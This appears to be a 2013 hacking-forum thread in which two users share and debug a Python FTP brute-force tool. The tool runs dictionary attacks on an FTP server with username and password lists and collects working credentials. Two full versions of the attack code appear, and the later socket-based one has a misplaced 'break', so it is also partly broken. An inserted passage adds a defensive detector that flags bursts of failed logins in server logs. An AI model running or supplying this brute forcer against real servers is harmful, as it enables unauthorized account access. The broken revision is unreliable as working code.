Sinisterly
[Python] FTP Brute - Printable Version


[Python] FTP Brute - mls577 - 06-25-2013

This is an FTP brute forcer written in Python by me and now noize with the updated code. I thought I'd post it for learning purposes, have fun.

Code:
#!/usr/bin/env/python3.1
#ftpbrute.py
#mls577 and noize
#shoutz to suidrewt and #haxme
#ftpbrute is a simple ftp brute force tool that noize and I wrote that will take a single username, or a list of usernames from a file and try them
#along with a specified password file to do a dictionary attack on an ftp server in order to find login credentials

#imports
import socket, sys
import ftplib
from ftplib import FTP

successful_logins = [] #list of successful logins

def main():
    if(len(sys.argv) < 4): # argument check
        usage() # if not enough args are specified print usage
    else:
        usage()
        userpass() #else call userpass()
        if(len(successful_logins) == 0):
            print("\n\nNo Successful Logins Found")
        else:
            print("\n\nSuccessful Logins Found: \n")
            for creds in successful_logins:
                print(creds)

def usage():
    print("\n  ###########################################################################")
    print("  #                              FTP BRUTE 1.0                              #")
    print("  #                                                                         #")
    print("  #                        Coded by mls577 and noize                        #")
    print("  #                          #suidrewt and #haxme                           #")
    print("  ###########################################################################")
    print("\n Usage: ftpbrute.py [host] [single | multi] [username | userslist] [passlist]")
    print("\n Examples:")
    print("\n  ftpbrute.py www.example.com single admin pass.txt")
    print("  ftpbrute.py www.example.com multi users.txt pass.txt")

def userpass():

    username_option = sys.argv[2] # user mode
    password_file = open(sys.argv[4], 'r') # password file

    if(username_option == "single"):
        user = sys.argv[3] #username

        for password in password_file:
            connect(user, password) #pass credentials to connect()

    elif(username_option == "multi"):

        username_file = open(sys.argv[3], 'r') #username file
        
        for user in username_file:
            for password in password_file:              
                login = connect(user, password) #pass credentials to connect()

    else:
        print("Error! Unexpected user option!")

def connect(user, password):

    host = sys.argv[1] #ftp server address

    try:
        FTP(host, user, password) #attempted ftp connection
        print("\nNow trying: " + user + " " + password + "\nSuccessful Login!")
        creds = user + ":" + password #format
        successful_logins.append(creds) #add successful logins to list
    except ftplib.error_perm:
        print("\nNow trying: " + user + " " + password + "\nUnsuccessful Login")
        

main()
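
How the dictionary attack this tool performs looks from the server side, as an added example that is not part of the original post or the thread authors' code: a detector that scans FTP server logs for bursts of failed logins and for a successful login that follows one. The log layout (vsftpd-style `FAIL LOGIN` / `OK LOGIN` records), the function name `find_password_guessing`, the thresholds and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample in vsftpd log style (assumed format); documentation-range IPs.
SAMPLE_LOG = """\
Tue Jun 25 10:00:01 2013 [pid 2101] [admin] FAIL LOGIN: Client "203.0.113.7"
Tue Jun 25 10:00:02 2013 [pid 2102] [admin] FAIL LOGIN: Client "203.0.113.7"
Tue Jun 25 10:00:03 2013 [pid 2103] [admin] FAIL LOGIN: Client "203.0.113.7"
Tue Jun 25 10:00:04 2013 [pid 2104] [admin] FAIL LOGIN: Client "203.0.113.7"
Tue Jun 25 10:00:05 2013 [pid 2105] [admin] OK LOGIN: Client "203.0.113.7"
Tue Jun 25 10:00:06 2013 [pid 2106] [admin] FAIL LOGIN: Client "203.0.113.7"
Tue Jun 25 10:05:00 2013 [pid 2200] [alice] FAIL LOGIN: Client "198.51.100.20"
Tue Jun 25 10:05:30 2013 [pid 2201] [alice] OK LOGIN: Client "198.51.100.20"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d+ [\d:]{8} \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"')

def find_password_guessing(log_text, threshold=4, window=timedelta(seconds=60)):
    """Flag clients reaching `threshold` failed logins within `window`; "guessed"
    holds accounts that then logged in OK from a flagged client."""
    recent = defaultdict(deque)   # ip -> timestamps of failures inside the window
    users = defaultdict(set)      # ip -> account names it failed against
    flagged = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue              # not a login record
        ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
        ip, user = m["ip"], m["user"]
        if m["result"] == "FAIL":
            q = recent[ip]
            q.append(ts)
            while ts - q[0] > window:      # drop failures older than the window
                q.popleft()
            users[ip].add(user)
            if len(q) >= threshold:
                entry = flagged.setdefault(ip, {"failures": 0, "users": users[ip], "guessed": set()})
                entry["failures"] = max(entry["failures"], len(q))
        elif ip in flagged:
            # Success after a burst of failures: treat the password as guessed.
            flagged[ip]["guessed"].add(user)
    return flagged

if __name__ == "__main__":
    for ip, info in find_password_guessing(SAMPLE_LOG).items():
        print(ip, info)
```

A single mistyped password followed by a correct one (the `alice` lines) stays below the threshold and is not flagged. Any account that ends up in `guessed` should have its password reset and the client address blocked.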



RE: [Python] FTP Brute - MrGeek - 06-25-2013

This is interesting mate :)
I will check this out.


RE: [Python] FTP Brute - noize - 06-26-2013

This is a good idea, though, I tested this on my host on port 21 with single user mode (my username) and with a passlist containing 6 words where one was the correct one and it just failed.


RE: [Python] FTP Brute - mls577 - 06-26-2013

(06-26-2013, 07:45 AM)noize Wrote: This is a good idea, though, I tested this on my host on port 21 with single user mode (my username) and with a passlist containing 6 words where one was the correct one and it just failed.

Sorry about that, I checked my code and found a few errors. They should be fixed now, try the new code.


RE: [Python] FTP Brute - noize - 06-26-2013

Well, now I get "login successful!" for any password, lol.


RE: [Python] FTP Brute - mls577 - 06-26-2013

Seriously? That didn't happen for me when I just tested it. Mother fucker. It's late here, I'll look at it tomorrow. Try removing code == 220 from the if statement near the end, see if that works.


RE: [Python] FTP Brute - noize - 06-26-2013

I already tried, but it just says "login failed" like before.

However, take a look at this: http://en.wikipedia.org/wiki/List_of_FTP_server_return_codes

220 does not seem to be what you need, you should probably take that away.

P.S: may I suggest editing the code like this:

Code:
#mls577
# shoutz to suidrewt and #haxme
#ftpbrute is a simple ftp brute force tool I wrote that will take a single username, or a list of usernames from a file and try them
#along with a specified password file to do a dictionary attack on an ftp server in order to find login credentials
import socket, sys #imports

def main():
    if(len(sys.argv) < 5): # argument check
        usage()
    else:
        userpass()


def usage():
    print("FTP Brute by mls577 ")
    print(" shoutz to #suidrewt and #haxme")
    print("./ftpbrute.py <host> <port> <user option> <user or user list> <pass list>")
    print("\nsingle user mode:")
    print("./ftpbrute.py <host> <port> single <username> <password_file>")
    print("ex: ./ftpbrute.py <host> <port> single mls577 /home/mls577/pass.txt")
    print("\nmulti-user and multi-pass: ")
    print("./ftpbrute.py <host> <port> multi <username_list> <password_list>")
    print("ex: ./ftpbrute.py <host> <port> multi /home/mls577/user.txt /home/mls577/pass.txt")



def userpass():
    username_option = sys.argv[3] #user mode


    
    password_file = open(sys.argv[5], 'rb') #password file
    

    if(username_option == "single"):
        user = sys.argv[4]
        user = str.encode(user)
        for password in password_file:
            connect(user, password)

    elif(username_option == "multi"):
        
        username_file = open(sys.argv[4], 'rb')
        
        for user in username_file:
            for password in password_file:
                print(user, password)                
                login = connect(user,password)
        
    else:
        print("wrong user option")



def connect(user, password):
    
    
    s = socket.socket() #create socket
    host = sys.argv[1] #host
    port = sys.argv[2] #port
    s.connect((host, int(port))) #makes connection
    print("\ntrying " + str(user) + " " + str(password))
    s.send(b'USER ' + user + b'\r\n') #send username
    s.send(b'PASS ' + password + b'\r\n') #send password
    code = s.recv(3) #recieve ftp response code
    #check ftp response code for successful login, which is normally 230 but I found in some software it was 220 instead
    if(int(code) == 230):
        print("login successful!")
        break
    else:
        print("login failed")
        
main()

changelog:
- not showing usage if arguments are valid;
- breaks if login is successful.


RE: [Python] FTP Brute - mls577 - 06-26-2013

I don't want it to break, because I want it to continue trying all the login combinations, even if it has already found one.

Whether the usage should be displayed for both is relative, I think it's fine either way. For the life of me, I can't figure out why this won't work. I keep changing and trying different things, but for some godforsaken reason it won't just work. I wrote this nearly a year ago, and thought I got it to work properly, guess not.

About the response codes, I've seen that page and checked to make sure through the RFC (http://tools.ietf.org/html/rfc354). I know 230 is correct, but on the FTP server I set up, for some reason it kept sending back 220 as the login successful.
Thanks for the help. I'll keep working to figure this out.


RE: [Python] FTP Brute - noize - 06-26-2013

(06-26-2013, 10:57 PM)mls577 Wrote: I don't want it to break, because I want it to continue trying all the login combinations, even if it has already found one.

Oh, well, you're right, I didn't think about when the user chooses to use the "multi" option.

Quote: Whether the usage should be displayed for both is relative, I think it's fine either way. For the life of me, I can't figure out why this won't work. I keep changing and trying different things, but for some godforsaken reason it won't just work. I wrote this nearly a year ago, and thought I got it to work properly, guess not.

Thanks for the help. I'll keep working to figure this out.

I tried switching a few error codes but I just can't get it to. Does it work for you?


RE: [Python] FTP Brute - mls577 - 06-26-2013

No, I still can't get it to work properly for some reason. We could work on this together?